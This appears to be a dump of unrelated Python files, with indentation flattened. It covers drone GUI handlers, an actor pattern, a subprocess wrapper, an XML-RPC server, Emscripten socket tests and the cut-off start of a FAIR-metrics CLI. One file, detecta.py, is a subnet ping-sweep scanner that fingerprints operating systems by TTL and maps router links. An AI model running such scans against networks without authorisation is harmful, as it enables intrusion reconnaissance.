if follow != self.control.isFollowingTarget():
self.control.followTarget(follow)
self.showMessage('Target following set to '+str(follow))
if mimic != self.control.isMimingTarget():
self.control.mimicTarget(mimic)
self.showMessage('Target imitation set to '+str(mimic))
if mask != self.control.getMask():
self.control.setMask(*mask)
self.showMessage('Control mask set to '+str(mask))
# Update drone manual inputs
roll, pitch, yaw, thrust = self.controlPanel.getAttitude()
self.control.setManualAttitude(roll, pitch, yaw, thrust)
# Update rigid bodies list in CP
self.controlPanel.updateBodies(self.drone.getTrackersList())
def keyPressEvent(self, event):
"""Press Enter to send setpoint, PWM or validate settings."""
# Enter pressed
if event.key() == Qt.Key_Return or event.key() == Qt.Key_Enter:
# Setpoint tab active
if self.controlPanel.currentIndex() == 0:
self.sendSetpoint()
# PWM tab active
elif self.controlPanel.currentIndex() == 2:
self.sendPWM()
def sendSetpoint(self):
"""Sends setpoint to the drone chosen in control panel."""
if self.controlPanel.setpointValid():
x, y, z, yaw = self.controlPanel.getSetpoint()
self.showMessage('Pose sent: '+str((x, y, z, yaw)))
self.control.setManualSetpoint(x, y, z, yaw)
else:
self.showMessage('Invalid setpoint')
def sendPWM(self):
"""Sends PWM value to fans array chosen in control panel."""
if self.controlPanel.pwmValid():
pwm = self.controlPanel.getPWM()
self.showMessage('PWM sent: '+str(pwm))
self.fansArray.setWindFunction(pwm)
else:
self.showMessage('Invalid PWM')
|
actor.py
|
# -*- coding: utf-8 -*-
"""
minimal actor pattern built on a Queue-based mailbox, with a sample PrintActor
"""
__author__ = "aaron.qiu"
from queue import Queue
from threading import Thread, Event
# Sentinel used for shutdown
class ActorExit(Exception):
pass
class Actor:
def __init__(self):
self._mailbox = Queue()
def send(self, msg):
'''
Send a message to the actor
'''
self._mailbox.put(msg)
def recv(self):
'''
Receive an incoming message
'''
msg = self._mailbox.get()
if msg is ActorExit:
raise ActorExit()
return msg
def close(self):
'''
Close the actor, thus shutting it down
'''
self.send(ActorExit)
def start(self):
'''
Start concurrent execution
'''
self._terminated = Event()
t = Thread(target=self._bootstrap)
t.daemon = True
t.start()
def _bootstrap(self):
try:
self.run()
except ActorExit:
pass
finally:
self._terminated.set()
def join(self):
self._terminated.wait()
def run(self):
'''
Run method to be implemented by the user
'''
while True:
msg = self.recv()
# Sample ActorTask
class PrintActor(Actor):
def run(self):
while True:
msg = self.recv()
print('Got:', msg)
# Sample use
p = PrintActor()
p.start()
p.send('Hello')
p.send('World')
p.close()
p.join()
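# Hedged extension sketch (not part of the original recipe): the same mailbox can
# dispatch on tagged messages instead of just printing them. The TaggedActor name
# and the (tag, payload) message convention below are assumptions for illustration.
class TaggedActor(Actor):
    def run(self):
        while True:
            tag, payload = self.recv()
            # Route the payload to a handler method named after the tag
            getattr(self, 'do_' + tag)(payload)
    def do_echo(self, text):
        print('Echo:', text)
# Sample use of the sketch
t = TaggedActor()
t.start()
t.send(('echo', 'Hello'))
t.close()
t.join()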
|
ub_process.py
|
import subprocess
import traceback
from multiprocessing import Process
from uniback.tools.data_trackers import ProgressTracker, DataTracker
from time import sleep
from threading import Thread, Lock
import os
# process object with the ability to deal with subprocesses and parse
# their output as necessary
class UBProcess(Process):
def __init__(self):
super().__init__()
self.name = "Generic UB Process"
self.description = "Process without a set description."
self.category = "undefined"
self.can_update = True
self.data = {}
self.job_log = []
self.progress_tracker = ProgressTracker()
self.data_tracker = DataTracker()
self.logging = None
def testMethod(self):
# self.update_thread = Thread(target=self.data_update, daemon=True)
# self.update_thread_lock = Lock()
pass
def run(self):
self.update_thread = Thread(target=self.data_update, daemon=True)
self.update_thread_lock = Lock()
try:
self.update_thread.start()
except Exception as e:
self.log(f"update_thread exception: {e}")
pass
def start_subprocess(self, command):
try:
self.task = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
# stdout, stderr = self.task.communicate()
except Exception as e:
self.log(f'Exception 1: {e}')
self.log(f'Traceback: {traceback.format_exc()}')
self.status('error')
return
try:
while self.task.poll() is None:
self.parse_input(self.task.stdout)
# self.log(self.progress_tracker.get_current_progress())
except Exception as e:
self.log(f'Exception 2: {e}')
self.log(f'Traceback: {traceback.format_exc()}')
self.status('error')
return
def parse_input(self, input):
temp = os.read(input.fileno(), 128).decode('utf-8')
        # We only run the (potentially many) regexes every so often, in case they
        # take up a lot of CPU time: a background thread re-enables parsing at a
        # fixed interval (currently 0.5 s, adjustable as needed). We still do the
        # os.read on every call so that the process is not halted.
self.update_thread_lock.acquire()
if self.can_update:
self.data_tracker.update(temp)
self.progress_tracker.set_progress(temp)
self.send_data('progress', self.progress_tracker.get_current_progress())
temp_values = self.data_tracker.get_data_values()
if temp_values is not None:
                for key, value in temp_values.items():
self.send_data(key, value)
self.can_update = False
self.update_thread_lock.release()
def assign_progress_tracker(self, regex):
self.progress_tracker.reset_progress()
self.progress_tracker.set_regex(regex)
def assign_data_tracker(self, name, regex):
self.data_tracker.insert_tracker(name, regex)
def assign_queue(self, queue):
self.queue = queue
def assign_logger(self, logger):
self.logger = logger
def assign_data_manager(self, data_manager):
self.data_manager = data_manager
def send_data(self, data_name, data):
self.queue.put(
{'process_id': self.pid,
'data_name': data_name,
'data': data})
def log(self, data):
self.send_data('log', data)
def status(self, data):
self.send_data('status', data)
def data_update(self):
while True:
self.update_thread_lock.acquire()
self.can_update = True
self.update_thread_lock.release()
sleep(0.5)
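# Hedged illustration (not part of the original class): parse_input/data_update
# above form a simple rate limiter -- the expensive regex parsing only runs when
# the background thread has re-enabled `can_update`. The guarded demo below shows
# the same pattern in isolation, reusing Thread, Lock and sleep imported at the
# top of this module; RateLimiter and allow() are assumed names for illustration.
if __name__ == '__main__':
    class RateLimiter:
        def __init__(self, interval=0.5):
            self._lock = Lock()
            self._can_run = True
            Thread(target=self._rearm, args=(interval,), daemon=True).start()
        def _rearm(self, interval):
            # Background thread: re-allow one expensive run per interval
            while True:
                with self._lock:
                    self._can_run = True
                sleep(interval)
        def allow(self):
            # Returns True at most once per interval, False otherwise
            with self._lock:
                if self._can_run:
                    self._can_run = False
                    return True
                return False
    limiter = RateLimiter(0.5)
    hits = sum(limiter.allow() for _ in range(1000))
    print('expensive parsing would have run', hits, 'time(s) in this tight loop')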
|
server.py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import threading
try:
from SimpleXMLRPCServer import SimpleXMLRPCServer
except ImportError:
from xmlrpc.server import SimpleXMLRPCServer
# socket.setdefaulttimeout(10)
__all__ = ['Server']
class Server(SimpleXMLRPCServer):
"""Version of a `SimpleXMLRPCServer` that can be ceanly terminated from the client side.
Examples
--------
.. code-block:: python
# service.py
from compas.rpc import Server
from compas.rpc import Service
from compas.rpc import kill
from compas.rpc import ping
class DefaultService(Service):
pass
if __name__ == '__main__':
server = Server(("localhost", 8888))
server.register_function(ping)
server.register_function(kill)
server.register_instance(DefaultService())
server.serve_forever()
"""
def ping(self):
"""Simple function used to check if a remote server can be reached.
Notes
-----
Should be used together with an instance of `compas.rpc.Server`.
"""
return 1
def remote_shutdown(self):
threading.Thread(target=self._shutdown_thread).start()
return 1
def _shutdown_thread(self):
self.shutdown()
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
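# Hedged client-side sketch (not part of the original module): assuming a Server
# like the one in the docstring above is listening on localhost:8888 with `ping`
# registered, a plain xmlrpc client can reach it as below. The helper name and
# port are assumptions; `remote_shutdown` is only callable remotely if it was
# registered as well.
def _example_client(url="http://localhost:8888"):
    from xmlrpc.client import ServerProxy
    proxy = ServerProxy(url)
    print(proxy.ping())      # -> 1 when the server is reachable
    proxy.remote_shutdown()  # asks the server to terminate itself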
|
detecta.py
|
from scapy.all import *
import platform
import subprocess
from threading import Thread
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
"""
@args:
    <ip> Converts a list of integers to a string for display
"""
def arr_to_ip(ip):
return f"{ip[0]}.{ip[1]}.{ip[2]}.{ip[3]}"
"""
@args:
    <host> An IP address as a string
    <result> A list in which the output data is stored
"""
def ping(host,result):
param = '-n' if platform.system().lower()=='windows' else '-c'
command = ['ping', param, '1', host]
res=subprocess.Popen(command,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output=res.stdout.read().decode("utf-8")
r="100% packet loss" not in output
msg=""
res.terminate()
if r:
msg=f"{GREEN} with answer [✓]{END}"
else:
msg=f"{RED} without answer [x]{END}"
result.append([r,f"{YELLOW} Send data to: {host.ljust(15)} {msg}",host,output.split("\n")[1]])
"""
@args:
    <prefix> An integer value in the range 0-32 used to generate a network mask
"""
def create_masc_by_prefix(prefix):
net=[]
for i in range(4):
if (prefix-8)>=0:
net.append(255)
prefix-=8
if prefix==7:
net.append(254)
elif prefix==6:
net.append(252)
elif prefix==5:
net.append(248)
elif prefix==4:
net.append(240)
elif prefix==3:
net.append(224)
elif prefix==2:
net.append(192)
elif prefix==1:
net.append(128)
mis=4-len(net)
for i in range(mis):
net.append(0)
return net
"""
@args:
    <srcs> Our own IP address as a string
    <host> The target IP address as a string
    <result> A list that will store the results of the function
"""
def is_host_up(srcs,host,result):
p=sr1(IP(src=srcs,dst=host)/ICMP()/"hola",timeout=15,verbose=False)
if p is None:
result.append([False,f"{YELLOW} Send data to: {host.ljust(15)} {RED} without answer [x]{END}",host,None])
else:
result.append([True,f"{YELLOW} Send data to: {host.ljust(15)} {GREEN} with answer [✓]{END}",host,p.getlayer(IP).ttl])
"""
@args:
    <net> The network mask as a list of ints
"""
def determinate_prefix(net):
c=0
for i in range(4):
if net[i]==255:
c+=8
elif net[i]==254:
c+=7
elif net[i]==252:
c+=6
elif net[i]==248:
c+=5
elif net[i]==240:
c+=4
elif net[i]==224:
c+=3
elif net[i]==192:
c+=2
elif net[i]==128:
c+=(1)
return c
"""
@args:
    <ip> An IP address, as a list of ints, used to generate the network identifier
    <net> Our network mask as a list of ints
"""
def get_id_net(ip,net):
idnet=[]
for i in range(4):
idnet.append((ip[i]&net[i]))
return idnet
"""
@args:
    <idnet> The subnet identifier as a list of ints
    <net> The network mask as a list of ints
"""
def get_broadcast_ip(idnet,net):
ran=[]
for i in range(4):
ran.append((idnet[i]|((~net[i])&0xFF)))
return ran
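# Hedged worked example (not part of the original script): the helper below is an
# assumed name; it ties the mask/id/broadcast helpers above together for the
# address 192.168.1.130 with a /26 prefix.
def _example_subnet():
    mask = create_masc_by_prefix(26)              # [255, 255, 255, 192]
    idnet = get_id_net([192, 168, 1, 130], mask)  # [192, 168, 1, 128]
    broadcast = get_broadcast_ip(idnet, mask)     # [192, 168, 1, 191]
    print(arr_to_ip(idnet) + "/" + str(determinate_prefix(mask)),
          "broadcast", arr_to_ip(broadcast))      # 192.168.1.128/26 broadcast 192.168.1.191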
"""
@args:
    <ttl> An integer value in the range 0-255
"""
def check_os_by_ttl(ttl):
if ttl<=64:
return f"Unix-OS {64-ttl}"
elif ttl>64 and ttl<=128:
return f"MS-DOS_Windows-OS {128-ttl}"
elif ttl>128:
return f"Cisco_Router_IOS {255-ttl}"
"""
@args:
    <ips> The first IP address of the subnet as a list of ints
    <broadcast> The broadcast address as a list of ints
"""
def scan_range(ips,broadcast):
responde=[]
threads=[]
positivos=[]
c=35
i=0
b=0
while(True):
if i%c==0 and i>0:
for t in range(len(threads)):
threads[t].join()
#print(responde[t][1])
if responde[t][0]:
ttl=responde[t][3].split("ttl=")[1]
ttl=int(ttl.split(" ")[0])
positivos.append({responde[t][2]:check_os_by_ttl(ttl)})
threads=[]
responde=[]
b+=1
threads.append(Thread(target=ping,args=(f"{ips[0]}.{ips[1]}.{ips[2]}.{ips[3]}",responde)))
threads[-1].start()
i+=1
if ips[3]+1==256:
ips[3]=0
if ips[2]+1==256:
ips[2]=0
if ips[1]+1==256:
ips[1]=0
else:
ips[1]+=1
else:
ips[2]+=1
else:
ips[3]+=1
if ips==broadcast:
break
for t in range(len(threads)):
threads[t].join()
#print(responde[t][1])
if responde[t][0]:
ttl=responde[t][3].split("ttl=")[1]
ttl=int(ttl.split(" ")[0])
positivos.append({responde[t][2]:check_os_by_ttl(ttl)})
return positivos
"""
@args:
    <arr> The array containing the response dictionaries
    <ip> The IP address, as a string, to be checked for presence in the responses
"""
def check_str_ip_in_arr_dict(arr,ip):
for i in arr:
if ip in i.keys():
return True
return False
"""
@args:
    <dict> The dictionary of routers used to determine the interconnections between them
"""
def verifica_conectividad(dict,arr_resp,dict_int):
conexiones=[]
dict_conexiones=[]
for i,j in dict.items():
for k,v in dict.items():
if k!=i:
for a,b in v.items():
if b in j.values():
if (f"{i}-{k}:{b}" not in conexiones) and (f"{k}-{i}:{b}" not in conexiones):
r1=a.split("-sub")[0]
r2=""
for c,d in j.items():
if d==b:
r2=c.split("-sub")[0]
ip_r1=dict_int[i][r2].split("/")[0]
ip_r2=dict_int[k][r1].split("/")[0]
if (check_str_ip_in_arr_dict(arr_resp,ip_r1) and check_str_ip_in_arr_dict(arr_resp,ip_r2)):
conexiones.append(f"{i}-{k}:{b}")
diccio={"ip_1":ip_r2,"interface_1":r1,"host_1":k,
"ip_2":ip_r1,"interface_2":r2,"host_2":i}
dict_conexiones.append(diccio)
return [conexiones,dict_conexiones]
def verifica_index(arr,patern):
c=0
for i in arr:
if patern in i:
break
c+=1
return c
def create_wildcard(net):
wildcard=[]
for i in range(4):
wildcard.append(net[i]-255)
if wildcard[i]<0:
wildcard[i]=-wildcard[i]
return wildcard
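# Hedged example (not part of the original script): create_wildcard inverts a mask
# octet by octet; for the /26 mask used above it yields the ACL-style wildcard
# below. The helper name is an assumption for illustration.
def _example_wildcard():
    mask = create_masc_by_prefix(26)  # [255, 255, 255, 192]
    print(create_wildcard(mask))      # -> [0, 0, 0, 63]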
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import multiprocessing
import os
import socket
import shutil
import sys
import time
from subprocess import Popen
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner sockets')
try:
import websockify
except Exception:
# websockify won't successfully import on Windows under Python3, because socketserver.py doesn't export ForkingMixIn.
# (On python2, ForkingMixIn was exported but it didn't actually work on Windows).
# Swallowing the error here means that this file can always be imported, but won't work if actually used on Windows,
# which is the same behavior as before.
pass
import clang_native
from common import BrowserCore, no_windows, create_file, test_file, read_file
from tools import shared, config, utils
from tools.shared import PYTHON, EMCC, path_from_root, WINDOWS, run_process, CLANG_CC
npm_checked = False
def clean_processes(processes):
for p in processes:
if (not hasattr(p, 'exitcode') or p.exitcode is None) and (not hasattr(p, 'returncode') or p.returncode is None):
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except OSError:
pass
time.sleep(1)
# send a forcible kill immediately afterwards. If the process did not die before, this should clean it.
try:
        p.kill() # SIGKILL
except OSError:
pass
class WebsockifyServerHarness():
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
run_process([CLANG_CC, test_file(self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + clang_native.get_clang_native_args() + self.args, env=clang_native.get_clang_native_env())
process = Popen([os.path.abspath('server')])
self.processes.append(process)
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except IOError:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness():
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(config.NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([EMCC, '-Werror', test_file(self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(config.NODE_JS + ['server.js'])
self.processes.append(process)
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
# Executes a native executable server process
class BackgroundServerProcess():
def __init__(self, args):
self.processes = []
self.args = args
def __enter__(self):
print('Running background server: ' + str(self.args))
process = Popen(self.args)
self.processes.append(process)
def __exit__(self, *args, **kwargs):
clean_processes(self.processes)
def NodeJsWebSocketEchoServerProcess():
return BackgroundServerProcess(config.NODE_JS + [test_file('websocket/nodejs_websocket_echo_server.js')])
def PythonTcpEchoServerProcess(port):
return BackgroundServerProcess([PYTHON, test_file('websocket/tcp_echo_server.py'), port])
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(cls):
super().setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
# Use emscripten root for node module lookup. This is needed because the unit tests each
# run with CWD set to a temporary directory outside the emscripten tree.
print('Setting NODE_PATH=' + path_from_root('node_modules'))
os.environ['NODE_PATH'] = path_from_root('node_modules')
def test_sockets_echo(self, extra_args=[]):
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use consecutive server listen ports,
# because server teardown might not occur deterministically (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port addresses. If adding new tests,
# increment the used port addresses below.
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=0'], 49161), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=1'], 49162), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1'], 49163), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 49160), 0)]
for harness, datagram in harnesses:
with harness:
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram])
def test_sockets_echo_pthreads(self, extra_args=[]):
self.test_sockets_echo(['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
def test_sdl2_sockets_echo(self):
harness = CompiledServerHarness('sdl2_net_server.c', ['-sUSE_SDL=2', '-sUSE_SDL_NET=2'], 49164)
with harness:
self.btest_exit('sdl2_net_client.c', args=['-sUSE_SDL=2', '-sUSE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
def test_sockets_async_echo(self):
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=0', '-DTEST_ASYNC=1'], 49167), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=1', '-DTEST_ASYNC=1'], 49168), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1', '-DTEST_ASYNC=1'], 49169), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_ASYNC=1'], 49166), 0)]
for harness, datagram in harnesses:
print('harness:', harness)
with harness:
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, '-DTEST_ASYNC=1'])
return
# Deliberately attempt a connection on a port that will fail to test the error callback and getsockopt
print('expect fail')
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-DSOCKK=49169', '-DTEST_ASYNC=1'])
def test_sockets_echo_bigdata(self):
sockets_include = '-I' + test_file('sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
message += str(chr(ord('a') + (i % 26)))
# re-write the client test with this literal (it's too big to pass via command line)
src = read_file(test_file('sockets/test_sockets_echo_client.c'))
create_file('test_sockets_echo_bigdata.c', src.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message))
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=0'], 49172), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=1'], 49173), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 49171), 0)]
for harness, datagram in harnesses:
with harness:
self.btest_exit('test_sockets_echo_bigdata.c', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram])
@no_windows('This test is Unix-specific.')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(test_file('sockets/test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_partial_client.c'), assert_returncode=165, args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(test_file('sockets/test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_select_server_down_client.c'), args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_select_server_closes_connection_client_rw.c'), args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete('enet')
shutil.copytree(test_file('third_party', 'enet'), 'enet')
with utils.chdir('enet'):
self.run_process([path_from_root('emconfigure'), './configure', '--disable-shared'])
self.run_process([path_from_root('emmake'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + self.in_dir('enet', 'include')]
for harness in [
CompiledServerHarness(test_file('sockets/test_enet_server.c'), enet, 49210)
]:
with harness:
self.btest_exit(test_file('sockets/test_enet_client.c'), args=enet + ['-DSOCKK=%d' % harness.listen_port])
def test_nodejs_sockets_echo(self):
# This test checks that sockets work when the client code is run in Node.js
if config.NODE_JS not in config.JS_ENGINES:
self.skipTest('node is not present')
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=0'], 59162), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=1'], 59164), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 59160), 0)]
# Basic test of node client against both a Websockified and compiled echo server.
for harness, datagram in harnesses:
with harness:
expected = 'do_msg_read: read 14 bytes'
self.do_runf(test_file('sockets/test_sockets_echo_client.c'), expected, emcc_args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram])
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
# server because as long as the subprotocol list contains binary it will configure itself to accept binary
# This test also checks that the connect url contains the correct subprotocols.
print("\nTesting compile time WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 59166)
]:
with harness:
self.run_process([EMCC, '-Werror', test_file('sockets/test_sockets_echo_client.c'), '-o', 'client.js', '-sSOCKET_DEBUG', '-sWEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'])
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
create_file('websocket_pre.js', '''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 59168)
]:
with harness:
self.run_process([EMCC, '-Werror', test_file('sockets/test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js=websocket_pre.js', '-sSOCKET_DEBUG', '-DSOCKK=12345'])
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
# Test Emscripten WebSockets API to send and receive text and binary messages against an echo server.
# N.B. running this test requires 'npm install ws' in Emscripten root directory
def test_websocket_send(self):
with NodeJsWebSocketEchoServerProcess():
self.btest_exit(test_file('websocket/test_websocket_send.c'), args=['-lwebsocket', '-sNO_EXIT_RUNTIME', '-sWEBSOCKET_DEBUG'])
# Test that native POSIX sockets API can be used by proxying calls to an intermediate WebSockets -> POSIX sockets bridge server
def test_posix_proxy_sockets(self):
# Build the websocket bridge server
self.run_process(['cmake', path_from_root('tools/websocket_to_posix_proxy')])
self.run_process(['cmake', '--build', '.'])
if os.name == 'nt': # This is not quite exact, instead of "isWindows()" this should be "If CMake defaults to building with Visual Studio", but there is no good check for that, so assume Windows==VS.
proxy_server = os.path.join(self.get_dir(), 'Debug', 'websocket_to_posix_proxy.exe')
else:
proxy_server = os.path.join(self.get_dir(), 'websocket_to_posix_proxy')
with BackgroundServerProcess([proxy_server, '8080']):
with PythonTcpEchoServerProcess('7777'):
# Build and run the TCP echo client program with Emscripten
self.btest_exit(test_file('websocket/tcp_echo_client.cpp'), args=['-lwebsocket', '-sPROXY_POSIX_SOCKETS', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
|
test_metric.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import urllib
import urllib.request
import json
import requests
from requests.exceptions import SSLError
import rdflib
from rdflib import Graph, plugin
from rdflib.serializer import Serializer
import argparse
import termcolor
from string import Template
import itertools
import threading
import time
import sys
from datetime import datetime, timedelta
# import joblib
# from joblib import Parallel, delayed
import multiprocessing
from multiprocessing import Pool
from tqdm import *
# !!!!! breaks enumerate()
# from threading import *
import random
# from reprint import output
import subprocess
# timeout (connect, read) in secondes
TIMEOUT = (10, 3600)
PRINT_DETAILS = False
OUTPUT_DIR = "para_doi_test_output"
OUTPUT_PREF = "ptest"
parser = argparse.ArgumentParser(
description="A FAIRMetrics tester",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
# parser.add_argument("guid", help="The GUID to be tested (DOI, etc)")
parser.add_argument(
"-n", "--name", help="Print metric name to STDOUT", action="store_true"
)
parser.add_argument(
"-p", "--principle", help="Print principle number to STDOUT", action="store_true"
)
parser.add_argument(
"-d",
"--description",
help="Print description of the metrics to STDOUT",
action="store_true",
)
parser.add_argument(
"-c",
"--comment",
help="Zero or more letters from [iwfsc] (none=print all). Print comment messages for INFO, WARN, FAIL, SUCC, CRIT to STDOUT",
# default='all',
const="iwfsc",
nargs="?",
)
parser.add_argument(
"-wc",
"--write_comment",
help="Zero or more letters from [iwfsc] (none=print all). Filter comment messages for INFO, WARN, FAIL, SUCC, CRIT in output comment file",
# default='all',
const="iwfsc",
nargs="?",
)
parser.add_argument(
"-s", "--score", help="Print scores of the metrics to STDOUT", action="store_true"
)
parser.add_argument(
"-t", "--time", help="Print metric test time to STDOUT", action="store_true"
)
parser.add_argument(
"-i",
"--input",
help="The input GUID (Globally Unique Identifier: DOI, URL, etc...)",
)
parser.add_argument(
"-D",
"--directory",
help="Output directory",
default=OUTPUT_DIR,
)
parser.add_argument(
"-o", "--output", help="Output prefix filenames", default=OUTPUT_PREF
)
parser.add_argument(
"-tn",
"--thread_num",
